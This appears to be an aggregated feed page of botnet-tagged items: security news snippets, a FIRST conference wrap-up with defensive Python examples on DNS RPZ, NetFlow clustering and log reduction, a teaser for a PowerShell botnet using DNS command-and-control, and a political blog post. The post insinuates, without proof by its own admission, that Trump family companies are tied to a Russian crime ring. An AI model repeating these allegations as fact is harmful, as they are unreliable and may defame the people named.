|Twitter Being Used As Botnet Command Channel|
Ah, Twitter in the news again; the bad guys sure do keep up with new trends. After being taken offline for a while by a Joejob DDoS attack, Twitter is in the news again – this time it’s being used as the command channel for a botnet. The normal method for controlling botnets is via […]
|Torpig Botnet Hijacking Reveals 70GB Of Stolen Data|
We mentioned Torpig in passing back in January 2008 when talking about the Mebroot rootkit, which digs deep into the Master Boot Record. It seems Torpig has been pretty active since then, and the latest news is that some security researchers have managed to infiltrate the botnet and collect some data on […]
The post Torpig Botnet Hijacking Reveals 70GB Of Stolen Data appeared first on Darknet - The Darkside.
|New Conficker Variant More Aggressive|
Conficker has gotten quite a lot of news recently, with it growing so fast and Microsoft offering a bounty for the authors. It seems the Conficker authors are really serious about retaining control of their botnet and expanding it further without hindrance from the companies trying to stop them. It’s quite likely they are […]
|The beginning of the end for the Mirai botnet?||A botnet that is starting to run out of steam?|
|Xavier Mertens: FIRST TC Amsterdam 2017 Wrap-Up|
Here is my quick wrap-up of the FIRST Technical Colloquium hosted by Cisco in Amsterdam. This was my first participation in a FIRST event. FIRST is an organization that helps with incident response, as stated on their website:
The event was organized at the Cisco office. Monday was dedicated to a training on incident response and the next two days were dedicated to presentations, all of them focusing on the defence side (“blue team”). Here are a few notes about interesting stuff that I learned.
The first day started with two guys from Facebook, Eric Water and Matt Moren. They presented the solution developed internally at Facebook to solve the problem of capturing network traffic: “PCAP doesn’t scale”. In fact, with their solution, it scales! To investigate incidents, PCAPs are often the gold mine. They contain many IOCs but they also introduce challenges: disk space, the retention policy, the growing network throughput. When vendors’ solutions don’t fit, it’s time to build your own. Ok, only big organizations like Facebook have the resources to do this, but it’s quite fun. The solution they developed can be seen as a service: “PCAP as a Service”. They started by building the right hardware for sensors and added a cool software layer on top of it. Once collected, interesting PCAPs are analyzed using the CloudShark service. They explained how they reached high performance by mixing NFS and their GlusterFS solution. Really a cool solution if you have multi-gigabit networks to tap!
The next presentation focused on “internal network monitoring and anomaly detection through host clustering” by Thomas Atterna from TNO. The idea behind this talk was to explain how to monitor internal traffic as well. Indeed, in many cases organizations still focus on the perimeter, but internal traffic is also important: we can detect proxies, rogue servers, C2, people trying to pivot, etc. The talk explained how to build clusters of hosts. A cluster of hosts is a group of devices that have the same behaviour, like mail servers, database servers, … Then you determine the “normal” behaviour per cluster and observe when individual hosts deviate from it. Clusters are based on behaviour (the amount of traffic, the number of flows, protocols, …). The model is useful when your network is quite closed and stable, but much more difficult to implement in an “open” environment (like university networks).
Then Davide Carnali made a nice review of the Nigerian cybercrime landscape. He explained in detail how they prepare their attacks, how they steal credentials, how they deploy the attacking platform (RDP, RAT, VPN, etc). The second part was a step-by-step explanation of how they abuse companies to steal (sometimes a lot of!) money. An interesting fact reported by Davide: the time between the compromise of a new host (to drop the malicious payload) and the generation of new maldocs pointing to this host is only… 3 hours!
The next presentation was given by Gal Bitensky (Minerva): “Vaccination: An Anti-Honeypot Approach”. Gal (re-)explained what the purpose of a honeypot is and how they can be defeated. Then he presented a nice review of the ways used by attackers to detect sandboxes. Basically, when a malware sample detects something “suspicious” (read: something that makes it think it is running in a sandbox), it just silently exits. Gal had the idea to create a script that plants plenty of such artefacts on a regular Windows system, so that malware which checks for them believes it is in a sandbox and refuses to run. His tool has been released here.
Paul Alderson (FireEye) presented “Injection without needles: A detailed look at the data being injected into our web browsers”. Basically, it was a huge review of 18 months of web-inject and other configuration data gathered from several botnets. Nothing really exciting.
The next talk was more interesting… Back to the roots: SWITCH presented their DNS Firewall solution. This is a service they provide not only to their members. It is based on DNS RPZ (Response Policy Zones). The idea was to provide the following features:
Indeed, when a DNS request is blocked, the user is redirected to a landing page which gives more details about the problem. Note that this can have a collateral effect, like blocking a complete domain (and not only specific URLs), since DNS policy acts on names, not on URLs. This is a great security control to deploy. Note that RPZ support is implemented in many solutions, especially BIND 9.
Finally, the first day ended with a presentation by Tatsuya Ihica from Recruit CSIRT: “Let your CSIRT do malware analysis”. It was a complete review of the platform they deployed to perform more efficient automated malware analysis. The project is based on Cuckoo, heavily modified to match their requirements.
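To make the RPZ behaviour concrete, here is an added example (not SWITCH's configuration, and not code from the talk) that models how a policy zone is applied to query names. The zone fragment, the landing-page name landing.example.org and the policy zone name are all constructed for the illustration; it shows the walled-garden CNAME redirect, the NXDOMAIN/NODATA/passthru encodings RPZ uses, and the collateral effect mentioned above: a wildcard trigger on example.biz catches docs.example.biz too, and only an explicit rpz-passthru. record carves a name back out.

```python
"""Added example: how a DNS RPZ policy zone turns queries into answers, and why
a wildcard trigger blocks a whole domain rather than one URL (stdlib only)."""

# Constructed policy zone fragment (not SWITCH's data). Owner names are written
# relative to the policy zone's apex, as they would be in a BIND zone file.
SAMPLE_RPZ = """
; walled garden: answer with a CNAME to a landing page that explains the block
malware.example.net     CNAME landing.example.org.
*.malware.example.net   CNAME landing.example.org.
; a whole-domain block: every name under example.biz is caught, not just one URL
example.biz             CNAME landing.example.org.
*.example.biz           CNAME landing.example.org.
; an exception carved out of the block above
allowed.example.biz     CNAME rpz-passthru.
; NXDOMAIN and NODATA answers for C2 and tracking names
c2.example.com          CNAME .
tracker.example.com     CNAME *.
"""

# RPZ encodes its actions as special CNAME targets
SPECIAL_TARGETS = {".": "NXDOMAIN", "*.": "NODATA",
                   "rpz-passthru.": "PASSTHRU", "rpz-drop.": "DROP"}


def parse_rpz(zone_text):
    """Map each trigger owner name (lower-case, no trailing dot) to its CNAME target."""
    policy = {}
    for line in zone_text.splitlines():
        line = line.split(";", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        owner, rtype, target = line.split()
        if rtype.upper() != "CNAME":
            continue                                 # other record types are out of scope here
        policy[owner.lower().rstrip(".")] = target.lower()
    return policy


def action_for(target):
    if target in SPECIAL_TARGETS:
        return (SPECIAL_TARGETS[target], None)
    return ("REDIRECT", target.rstrip("."))          # walled-garden landing page


def apply_policy(policy, qname):
    """Resolve a query name against the policy: an exact QNAME trigger wins,
    otherwise the closest enclosing wildcard trigger, otherwise the query passes."""
    q = qname.lower().rstrip(".")
    if q in policy:
        return action_for(policy[q])
    labels = q.split(".")
    for i in range(1, len(labels)):
        wild = "*." + ".".join(labels[i:])
        if wild in policy:
            return action_for(policy[wild])
    return ("PASSTHRU", None)


if __name__ == "__main__":
    policy = parse_rpz(SAMPLE_RPZ)
    for name in ("malware.example.net", "cdn.malware.example.net", "docs.example.biz",
                 "allowed.example.biz", "c2.example.com", "tracker.example.com", "www.example.org"):
        print(f"{name:28} -> {apply_policy(policy, name)}")
```

In BIND 9 the same records live in an ordinary zone file that is activated with a `response-policy { zone "rpz.example.org"; };` statement in named.conf. Real RPZ also supports several policy zones with ordered precedence and other trigger types (client IP, answer IP, nameserver name and IP), which this model leaves out; what it does show is that once docs.example.biz is served from the same domain as the bad content, a name-based block cannot tell them apart.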
The second day started with an introduction to the FIRST organization by Aaron Kaplan, one of the board members. I liked the quote given by Aaron:
Then the first talk was really interesting: Chris Hall presented “Intelligence Collection Techniques“. After explaining the different sources where intelligence can be collected (open sources, sinkholes, …), he reviewed a series of tools that he developed to help automate these tasks. His tools address:
All the tools are available here. A very nice talk with tips & tricks that you can use immediately in your organization.
The next talk was presented by a Cisco guy, Sunil Amin: “Security Analytics with Network Flows”. NetFlow isn’t a new technology. Initially developed by Cisco, there are today many versions and forks. Starting from the definition of a “flow” (“a layer 3 IP communication between two endpoints during some time period”), we got a review of NetFlow. NetFlow is valuable to increase the visibility of what’s happening on your networks, but it also has some specific points that must be addressed before performing analysis, e.g. de-duplication of flows (the same flow exported by several devices along its path). There are many use cases where flows are useful:
I would have expected a real case where NetFlow was used to discover something juicy. The talk ended with a review of tools available to process NetFlow data: SiLK, nfdump, ntop, but log management platforms can also be used, like the ELK stack or Apache Spot. Nothing really new but a good reminder.
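The two flow-related talks above (TNO's host clustering and Cisco's NetFlow analytics) fit together in one added example. This is not code from either speaker: it de-duplicates flow records exported by two devices, builds per-host behaviour features, groups the hosts with a tiny k-means, and then flags the host that deviates from its own cluster. The flow records, host names, the "mail"/"db" naming used to pick internal hosts, and the z-score threshold are all constructed assumptions.

```python
"""Added example: de-duplicate NetFlow-style records, cluster internal hosts by
behaviour and flag the hosts that deviate from their cluster (stdlib only)."""
import math
from collections import defaultdict
from statistics import mean, pstdev

FEATURE_NAMES = ("flows", "bytes", "peers", "dports")
INTERNAL_PREFIXES = ("mail", "db")   # assumption: which hosts we profile


def build_sample_flows():
    """Constructed flow records (not real data). Mail traffic is exported by both
    the 'core' and the 'edge' device, so every mail flow appears twice."""
    flows = []
    for host, n in (("mail1", 40), ("mail2", 38), ("mail3", 42)):
        for i in range(n):
            rec = {"exporter": "core", "src": f"10.0.1.{i}", "dst": host, "proto": "tcp",
                   "dport": 25, "bytes": 4000 + i, "start": 1000 + i}
            flows.append(rec)
            flows.append({**rec, "exporter": "edge"})          # duplicate export
    for host in ("db1", "db2", "db3", "db4", "db5", "db6"):
        for i in range(3):
            flows.append({"exporter": "core", "src": f"10.0.2.{i}", "dst": host, "proto": "tcp",
                          "dport": 5432, "bytes": 20000, "start": 2000 + i})
    for i in range(15):   # db3 also connects out to 15 external hosts on 443: odd for a DB
        flows.append({"exporter": "core", "src": "db3", "dst": f"203.0.113.{i}", "proto": "tcp",
                      "dport": 443, "bytes": 900, "start": 3000 + i})
    return flows


def dedupe(flows):
    """Keep one record per (src, dst, proto, dport, start), whatever exported it."""
    seen, unique = set(), []
    for f in flows:
        key = (f["src"], f["dst"], f["proto"], f["dport"], f["start"])
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique


def host_features(flows):
    """Per internal host: (flow count, total bytes, distinct peers, distinct dst ports)."""
    acc = defaultdict(lambda: {"flows": 0, "bytes": 0, "peers": set(), "dports": set()})
    for f in flows:
        for host, peer in ((f["src"], f["dst"]), (f["dst"], f["src"])):
            if host.startswith(INTERNAL_PREFIXES):
                a = acc[host]
                a["flows"] += 1
                a["bytes"] += f["bytes"]
                a["peers"].add(peer)
                a["dports"].add(f["dport"])
    return {h: (a["flows"], a["bytes"], len(a["peers"]), len(a["dports"])) for h, a in acc.items()}


def cluster_hosts(feats, k=2, rounds=10):
    """Tiny k-means on max-scaled features; seeds are the first host and the host
    farthest from it, so the result is deterministic for a given input."""
    names = sorted(feats)
    scale = [max(feats[h][j] for h in names) or 1 for j in range(len(FEATURE_NAMES))]
    vec = {h: [feats[h][j] / scale[j] for j in range(len(scale))] for h in names}
    centroids = [vec[names[0]]]
    while len(centroids) < k:
        far = max(names, key=lambda h: min(math.dist(vec[h], c) for c in centroids))
        centroids.append(vec[far])
    groups = {}
    for _ in range(rounds):
        groups = defaultdict(list)
        for h in names:
            groups[min(range(k), key=lambda i: math.dist(vec[h], centroids[i]))].append(h)
        centroids = [[mean(vec[h][j] for h in groups[i]) for j in range(len(scale))]
                     if groups[i] else centroids[i] for i in range(k)]
    return [groups[i] for i in range(k) if groups[i]]


def deviants(feats, clusters, z_max=2.0):
    """Within each cluster, flag hosts whose raw feature is more than z_max
    standard deviations from the cluster mean. Returns {host: [feature, ...]}."""
    flagged = {}
    for members in clusters:
        if len(members) < 3:            # too small to define 'normal'
            continue
        for j, name in enumerate(FEATURE_NAMES):
            vals = [feats[h][j] for h in members]
            mu, sd = mean(vals), pstdev(vals)
            if sd == 0:
                continue
            for h in members:
                if abs(feats[h][j] - mu) / sd > z_max:
                    flagged.setdefault(h, []).append(name)
    return flagged


if __name__ == "__main__":
    unique = dedupe(build_sample_flows())
    feats = host_features(unique)
    clusters = cluster_hosts(feats)
    for members in clusters:
        print("cluster:", members)
    print("deviants:", deviants(feats, clusters))
```

On the constructed data the 273 exported records collapse to 153 real flows, the database servers and the mail servers land in separate clusters, and db3 is flagged on every feature because of its outbound 443 connections. The clustering step is what keeps a busy mail server from looking anomalous: it is only compared with other mail servers. The same caveat the speaker raised applies here: in a university-style network where hosts have no stable role, the clusters are too diffuse for the within-cluster z-score to mean much.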
Then Joel Snape from BT presented “Discovering (and fixing!) vulnerable systems at scale“. BT, as a major player on the Internet, is facing many issues with compromised hosts (from customers to its own resources). Joel explained the workflow and tools they deployed to help in this huge task. It is based on the following cycle: introduction, data collection, exploration and remediation (the hardest part!).
I liked the description of their “CERT dropbox”, which can be deployed anywhere on the network to perform the following tasks:
An interesting remark from the audience: ISPs don’t only have to protect their customers from the wild Internet but also the Internet from their (bad) customers!
Feike Hacquebord, from Trend Micro, explained “How politically motivated threat actors attack“. He reviewed some famous stories of compromised organizations (like the French TV channel TV5) then reviewed the activity of some interesting groups like C-Major or Pawn Storm. A nice review of the Yahoo! OAuth abuse was given, as well as of the tab-nabbing attack against OWA services.
Finally, two other Cisco guys, Steve McKinney and Eddie Allan, presented “Leveraging Event Streaming and Large Scale Analysis to Protect Cisco“. Cisco is collecting a huge amount of data on a daily basis (they speak in terabytes!). As Splunk users, they are facing an issue with the indexing licence: to index all this data, they would need extra licences (and pay a lot of money). They explained how they “pre-process” the data before sending it to Splunk to reduce the noise and the amount of data to index.
The idea is to put a “black box” between the collectors and Splunk. They explained what’s in this black box with some use cases:
Some useful tips that they gave and that are valid for any log management platform:
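As an added illustration of what such a pre-processing box does (this is not Cisco's pipeline, just the two most common reductions written out): drop events nobody will ever search for, and collapse bursts of identical events into one record carrying a count and the first/last timestamp, while passing everything else through untouched. The sample events, the noise patterns and the firewall log format are constructed for the example.

```python
"""Added example: a pre-processing stage that drops known noise and collapses
repeated identical events before they reach the (licence-metered) indexer."""
import re
from collections import OrderedDict

# Constructed syslog-style events (not Cisco's data): "<timestamp> <host> <program>: <message>"
SAMPLE_EVENTS = [
    "2017-04-25T10:00:00 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.5:22",
    "2017-04-25T10:00:01 web1 nginx: GET /healthz 200",
    "2017-04-25T10:00:01 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.5:22",
    "2017-04-25T10:00:02 app1 app: DEBUG cache miss key=session:42",
    "2017-04-25T10:00:02 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.5:22",
    "2017-04-25T10:00:03 web1 nginx: GET /healthz 200",
    "2017-04-25T10:00:03 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.5:22",
    "2017-04-25T10:00:04 dc1 winlogon: 4625 failed logon user=admin src=198.51.100.7",
    "2017-04-25T10:00:04 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.5:22",
    "2017-04-25T10:00:05 app1 app: DEBUG cache miss key=session:43",
    "2017-04-25T10:00:05 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.5:22",
    "2017-04-25T10:00:06 web1 nginx: GET /healthz 200",
    "2017-04-25T10:00:06 fw1 kernel: DENY TCP 198.51.100.7 -> 10.0.0.6:22",
]

# Events nobody will ever search for: drop them before they cost licence volume.
NOISE_PATTERNS = [re.compile(r" GET /healthz \d{3}$"), re.compile(r": DEBUG ")]

# Events that repeat with identical fields: keep one record plus a count.
DENY_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) kernel: DENY (?P<proto>\S+) (?P<src>\S+) -> (?P<dst>\S+)$")


def reduce_events(lines):
    """Return (events to index, stats). Anything not matched by a rule is passed
    through unchanged, so unknown or rare events are never lost."""
    kept, aggregates = [], OrderedDict()
    stats = {"in": 0, "dropped": 0, "collapsed": 0}
    for line in lines:
        stats["in"] += 1
        if any(p.search(line) for p in NOISE_PATTERNS):
            stats["dropped"] += 1
            continue
        m = DENY_RE.match(line)
        if m:
            key = (m["host"], m["proto"], m["src"], m["dst"])
            agg = aggregates.get(key)
            if agg is None:
                aggregates[key] = {"first": m["ts"], "last": m["ts"], "count": 1}
            else:
                agg["last"], agg["count"] = m["ts"], agg["count"] + 1
                stats["collapsed"] += 1
            continue
        kept.append(line)
    # In a streaming deployment these summaries are flushed per time window;
    # here the whole batch is one window.
    for (host, proto, src, dst), agg in aggregates.items():
        kept.append(f'{agg["first"]} {host} kernel: DENY {proto} {src} -> {dst} '
                    f'count={agg["count"]} last={agg["last"]}')
    stats["out"] = len(kept)
    return kept, stats


if __name__ == "__main__":
    events, stats = reduce_events(SAMPLE_EVENTS)
    print("\n".join(events))
    print(stats)
```

Thirteen input events become three indexed ones here; the failed-logon event, which is the one an analyst actually wants, is untouched. The design choice worth copying is the default: rules only ever drop or collapse what they explicitly match, so a new log source flows through at full fidelity until someone writes a rule for it.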
Two intense days full of useful information and tips to better defend your networks and/or collect intelligence. The slides should be published soon.
|Wordpress Hacker Bot Surge - Trojan/Zombie/Botnet WordPress Spam Blogs||Hey folks - as many of you already know, I'm not a Wordpress fan (i.e., bias - MyST Blogsite), but I am a fan of stopping hackers and other nefarious web activity that threatens businesses.
While reviewing some real-time data a few minutes ago, I noticed more than 400 Wordpress hacker bots attacking one of our server banks in just the last 10 minutes. Thankfully we have some very sophisticated defense systems that protect our blogsite clients, but most Wordpress sites are unable to defend against security breaches that are resident in Wordpress to begin with.
I've read many posts on AR where folks using Wordpress are particularly angry about being hacked, but I have a hunch that Wordpress itself is a big part of the problem.
Perhaps (as a group) you should look carefully at your server logs and see what services are actually running lots of outbound requests and where they are going. I suspect those of you that are unknowingly harboring this threat might be able to apply a security patch or correction to remove this nasty beast. Kevin Burton didn't have a fix back in March, but he did know what it was - Trojan/ZombieBotnet.
The data below shows a pattern representing more than 2 million requests in one day by more than 3,000 total bots hitting just one of our many servers. This is up more than 50% in the last few days, so this trojan worm seems to be spreading and it's doing so on many versions of Wordpress. Read more about compromised Wordpress blogs.
|NEW INFO: A strange "Poker Venture" run out of Trump Tower||First: A plea for help. I rarely run fundraisers on this site, but an emergency just hit. After spending my meager savings on frivolities like medicine and a new video card, MY BLOODY AIR CONDITIONER DIED. I live in a very hot attic in a very humid part of the country. When the outside temperature turns hellish, it becomes even hellisher up here -- for me, for my ladyfriend, and for my poor diabetic doggiefriend George. |
If you "ding" the PayPal button to your left (you may have to scroll down), your generous contribution will go straight to the air conditioner fund. We don't need a big 'un. Our gratitude will be beyond words.
Before we get to our main investigative piece, we need to look at a couple of other stories...
Terror in the UK: Our sympathies and thoughts go out to the victims of the attack on the Finsbury Park Mosque, which has finally been officially labeled an act of terrorism.
Witnesses said he 'deliberately' drove onto the pavement outside north London's Muslim Welfare House - yards from the Finsbury Park Mosque - and jumped out of the cab shouting 'I'm going to kill all Muslims - I did my bit'.
A similar horror took place in Virginia:
A 17-year-old Muslim girl identified as Nabra was kidnapped and beaten to death early Sunday morning in Sterling, Virginia. She was reported as missing at roughly 4 a.m. and now police believe they have found her body in a pond.
So far, Donald Trump's twitter feed has mentioned neither of these outrages.
Roger Stone. The Roger Stone/Alex Jones team-up has been absolutely boggling. After building a formidable rep as a conspiratorial-mastermind-for-hire, Stone now pretends to be the victim of dark and evil forces. It's a surreal situation: Roger Stone is one of the original Watergaters and the king of the dirty tricksters, yet our modern paranoia addicts consider him an apostle of fair play and decency. What's next? Will the Infowarriors proclaim Pablo Escobar to be the saint of non-violence?
Stone's name came up in an NBC News story published yesterday: "NBC News Exclusive: Memo Shows Watergate Prosecutors Had Evidence Nixon White House Plotted Violence." In 1972, Nixonians planned to use bullyboys from YAF (Young Americans for Freedom, a notorious right-wing group of the time) to mount a violent physical attack against Daniel Ellsberg as he spoke -- along with William Kunstler and other notables -- at an anti-war rally on the Capitol steps. The Watergate Committee investigated the incident and outlined their findings in a memo that has remained unreleased until now.
Roger Stone was also interviewed. Here's a tidbit that everyone seems to have missed...
"Carl Rove"? Is that Turdblossom back when he was a young turd? Must be! Stone now seems to despise Rove, calling him a "political profiteer" -- unlike Stone himself, who always does what he does for the purest of motives, just like Jesus or Barry Allen. Also see here.
Ivanka, Donald and their "Poker Venture." Just after I had announced to the world that I was so over Louise Mensch, she publishes a truly fascinating bit of research which relies on open-source material instead of nameless informants. Okay, okay: The Nameless Ones do pop up in a couple of paragraphs. Readers of her piece should mentally excise those bits and double-check the rest.
Ivanka has been linked to eleven companies in the Trump financial disclosures. Her status has been put to “Inactive” on several odd holding companies...
The most immediately interesting company of Ivanka Trump’s is “Poker Venture Managing Member Corp“. This is owned by Donald and Ivanka Trump. Ivanka’s company with her father itself is an officer of this very dodgy-looking shell, “Poker Venture LLC.” Judging by the corporation wiki, there is panic in Team Ivanka and Team Trump over “Poker Venture“. It shows zero “Key People”, and has two other almost identical companies as its officers – the live, active PVMMC that Ivanka co-owns with her pops, and this “Inactive” attempt to clean Ivanka out of the picture: by: Poker Venture Managing Member Corp by: Donald J. Trump.
I'll say! Beyond the fact that Trump allegedly divested himself of his business interests, isn't it a little unseemly for the President of the United States to be listed as the owner of a company called Poker Venture Managing Member Corp, which filed in Nevada?
This company is related to another enterprise called simply Poker Ventures, whose listed address is 725 5th Avenue, New York, NY -- Trump Tower. Mensch seems to have missed that part, although she thinks that this "Poker" business somehow links up to the botnet which she believes is run out of Trump Tower. (I see no evidence for this beyond the inscrutable pronouncements of The Nameless Ones.)
I'll tell you something else that Louise Mensch seems to have missed: This Poker Venture business appears to link up to some scandalous doings outlined in one of my previous posts (of which I happen to be quite proud). It's hard to summarize that complicated piece, but I'll try.
A Russian "Godfather" named Alimzhan Tokhtakhounov ran a shady operation out of Trump Tower -- specifically, unit 63A, not far below Trump's own living quarters. It was so shady that the FBI had bugged the joint. (We're talking money laundering.)
Tokhtakhounov -- known as "Little Taiwan" or "Taiwanchik" because he looks Asian -- is the guy who linked Donald Trump up with the world of beauty contests in Russia. Taiwanchik has his fingers in all sorts of interesting deals -- for example, he was once arrested for rigging an Olympic figure skating competition.
Tokhtakhounov had partners in his New York enterprise -- Vadim Trincher and Anatoly Golubchik. (Trincher was the 2009 world poker champion.) They were tried and convicted. Guess who put 'em away? Preet Bharara.
Dirty money must needs be laundered, right? One great way to launder money is via the world of art. Banks won't ask too many questions if you tell 'em that someone just paid twenty million for a Picasso.From a 2013 story in the NYT:
Mr. Nahmad, a night-life fixture known for his showy extravagance and celebrity crowd — a $21 million Trump Tower apartment and friendships with people like Gisele Bündchen and Leonardo DiCaprio — was charged in April in a racketeering indictment brought by federal prosecutors in Manhattan. He was accused of being part financier, part money launderer and part bookmaker in a network that organized poker games and sports betting operations and drew hundred-thousand-dollar wagers from celebrities and billionaires.
The feds knew his secrets because they were listening in on Nahmad's cellphone chats.
But Helly’s interest in gambling led to trouble. The high-stakes poker and sports-betting ring that he is accused of helping to lead — with activity stretching from New York and Los Angeles — ultimately came to the attention of federal authorities who were investigating Russian organized crime figures.
All of this has to do with the world of high-stakes poker. These people linked up with a coast-to-coast gambling operation which attracted a number of Hollywood celebrities, including Ben Affleck and Tobey Maguire.
My original post has many more details -- and by "many" I mean MANY. (Check out the Cyprus connection, which takes in Nahmad, Taiwanchik and Trump himself.) But right now, I want you to focus on "the holy game of poker."
1. Donald and Ivanka run something called "Poker Venture," headquartered in Trump Tower but incorporated in Nevada.
2. Directly below Trump's living quarters was a crooked enterprise run by Russian crime lord Alimzhan Tokhtakhounov, whose links to Trump himself are beyond dispute. Tokhtakhounov got away; he is now in Russia.
3. Helly Nahmad, who also had a Trump Tower address, was involved with a nationwide (actually international) high-stakes poker ring.
4. Nahmad and Tokhtakhounov deny knowing each other, even though Preet Bharara named them both as co-defendants when he made a case against this money laundering/gambling operation. They also both link up with Trincher and the other defendants.
It may be as well to quote from the above-cited 2013 US Attorney's Office press release:
The Taiwanchik-Trincher Organization is a nationwide criminal enterprise with strong ties to Russia and Ukraine. The leadership of the organization ran an international sportsbook that catered primarily to Russian oligarchs living in Russia and Ukraine and throughout the world. The Taiwanchik-Trincher Organization laundered tens of millions of dollars in proceeds from the gambling operation from Russia and the Ukraine through shell companies and bank accounts in Cyprus, and from Cyprus into the U.S. Once the money arrived in the U.S, it was either laundered through additional shell companies or invested in seemingly legitimate investments, such as hedge funds or real estate.
Speaking of which: Many people have wondered who helped Jared Kushner purchase that ridiculously overpriced skyscraper at 666 Fifth Avenue. (I'm not claiming to have proof of a connection. I'm just sayin'.) For that matter, quite a few people have wondered why anyone would invest in Donald Trump's various properties, given the rather odd way he does business.
Let's get back to that press release:
The Nahmad-Trincher Organization is a nationwide criminal enterprise with leadership in Los Angeles, California, and New York City. The organization ran a high-stakes illegal gambling business that catered primarily to multi-millionaire and billionaire clients. The organization utilized several online gambling websites that operated illegally in the U.S. Debts owed to the Nahmad-Trincher Organization sometimes reached hundreds of thousands of dollars and even millions.
NYPD Commissioner Raymond W. Kelly said: “The subjects in this case ran high-stakes illegal poker games and online gambling, proceeds from which are alleged to have been funneled to organized crime overseas. The one thing they didn't bet on was the New York City police and federal investigators’ attention. I commend the NYPD Organized Crime Investigations Division and their partners in the FBI and U.S. Attorney Bharara's office for identifying and bringing the members of this organization to justice.”
Well, we know what Trump did to Bharara. No good deed goes unpunished.
The question before us is this: Is the "Poker Ventures" that lists Donald and Ivanka as owners -- and which lists Trump Tower as its address -- part of the very real "poker venture" run by criminals living right below Donald's feet in that very same building?
I can't prove it. But the nomenclature sure as hell makes the idea seem inescapable.
Nomenclature isn't all we have to go on. Let's return to Louise Mensch's article (stressing, once again, that this piece -- unlike much of her recent work -- derives from open sources, all properly cited)...
Equally odd is that the state of New Jersey – (Ivanka Trump has a New Jersey address listed as one of her business records, associated with Poker Ventures) – has added to its newly published list of “Internet Gaming Ancillary Companies” both Poker Ventures LLC, which was already listed, but also “Novacorp Net Ltd”, “VidMob Inc” and “Reblaze Technologies”.So: Poker Ventures has to do with online gambling. (The legality of online gaming is a matter of some dispute.) Remember: The crooked Nahmad/Trincher operation also involved online gambling.
And Poker Ventures LLC does indeed appear on that list compiled by the state of New Jersey. See for yourself.
Mensch goes on to connect Poker Ventures up with some other notable names on that list, shady concerns which have definite connections to both Russians and Israelis. One of these enterprises, Reblaze Technologies, seems to have little to do with gambling and much to do with hacking:
...it publishes anti-NSA blogs such as these, lauding the ‘hacking tools’ leaked by Shadow Brokers. Reblaze also offers lists of “protect your website” services you can buy from Russian hackers [sic], listing, ostensibly to protect against them, the full range of tools employed on Russia’s hack of America; its founder repeated the anti-NSA blog in an article that reads as a threat to hack America on Medium in December 2016.Fascinating stuff. That "protect your website" scam reminds me of the hoary "watch your car" racket illustrated in those old Dead End Kid movies. You should hit those links; they take you into very odd places.
Unfortunately, we don't yet have any proof (beyond the word of Mensch's Nameless Ones) that this Reblaze business is tied up with Trump's Poker Ventures. Pity that: The possibilities are very intriguing.
For that matter, I must reiterate that I cannot prove that Donald and Ivanka's weird foray into the worlds of poker and online gaming is part-and-parcel of the poker and online gaming operation run by Helly Nahmad and his Russian gangster associates. But come on: It's hard not to conclude that we're dealing with two ingredients from the same stew-pot. These poker-related ventures form a Venn diagram in which the two circles seem nearly congruent. You can't fairly accuse me of leaping to wild conclusions: This ain't the kind of hazy guff you get from Alex Jones.
Louise Mensch, if you're reading these words: Thanks for returning to the world of real investigative writing. In the future, I hope you stop relying on the private sources who have provided you with so many dubious scoops. You'll have much more impact if you continue to provide stories that can be verified.
I strongly urge you to look into the possible links between "Poker Ventures" and the real-world poker venture in Trump Tower.
And please: Next time you feel tempted to accuse a perceived adversary of being a Russian spy, bite your tongue until it bleeds. A little more caution in your rhetoric will help you in the long run.
Finally: If these words have proven intriguing or enlightening to you, please consider dinging that PayPal account. It's already infernally muggy in here -- several degrees hotter than the temps outside. I feel like I'm melting.
|A new vulnerability can make Mirai infections permanent|
Many of you will surely remember how, at the end of last year, the Mirai botnet wreaked havoc across the whole world. Botnet news (above all about Mirai) seemed to have gone somewhat quiet, and suddenly it is back in the headlines.
According to Bleeping Computer, Mirai is back on the front page because of a recently discovered vulnerability affecting IoT devices that can make this botnet's infections permanent instead of disappearing when the user reboots the device.
Malware that attacks IoT devices usually disappears on reboot, because rebooting clears the machine's RAM and leaves it completely clean. Since for now most IoT malware lives only there, it is "easy" to get rid of it. This news, however, changes everything.
Apparently the security researchers at Pen Test Partners who discovered it were studying the security features of 30 brands of DVR (digital video recorder) devices. It is precisely this vulnerability that would allow Mirai to survive across reboots.
As is logical, the security researchers did not want to publish any details about this vulnerability. The experts consider there are reasons to believe that malicious actors could take advantage of their findings to carry out criminal activities.
Mirai's reach could grow thanks to this vulnerability
Pen Test Partners' research has revealed other details that would allow Mirai to become relevant again and even more dangerous than before:
All of these flaws could bring Mirai back to life if they were exploited. According to the outlet, this malware family has been losing ground to other threats such as Persirai, BrickerBot or Hajime.
|SiteVision May News & Tips||US Disrupts Giant Botnet: U.S. authorities are in the process of taking down Kelihos, a huge botnet controlling tens of thousands of infected computers that distribute ransomware and malware by email globally. The dismantling, which is in progress, will allow the authorities to identify victims and aid them, as well as block attempts to infect others. See more at […]|
|Network Security Today | @CloudExpo #Cloud #AI #SDN #Security #Analytics||In its 2017 State of Malware Report, Malwarebytes Labs recorded a 267 percent increase in ransomware between January 2016 and November 2016, with over 400 different variants in total. The report noted that while malware authors mostly relied on ransomware to make the bulk of their revenues, there was an increase in ad fraud as well. Botnets and mobile malware also continue to expand and evolve. The report predicts that until IoT devices become secure out of the box, botnets will get even bigger and pose an even greater threat to the internet – and any company connected to it.|
|Network Security Report 2016-2017|
|Comments on T411: Canal VOD rides the shutdown and promises 50% off to the disappointed, by Botnet Universe||You said it all, brother :-)|
|A Storm of Scary Email||One of the hallmarks of the Storm botnet is the ubiquitous greeting card spam it sends out. The email generally includes a link that leads to a bogus 'viewer' for...
|Using DNS as a C2 channel||tl;dr: DNS C2 added to my PowerShell botnet, Galvatron. One of my planned extensions to Galvatron was to add DNS command and control, using the very same database and bot commands. This would provide yet another avenue to egress out of the network. And the best part? The egress traffic is written into actual DNS requests […]|
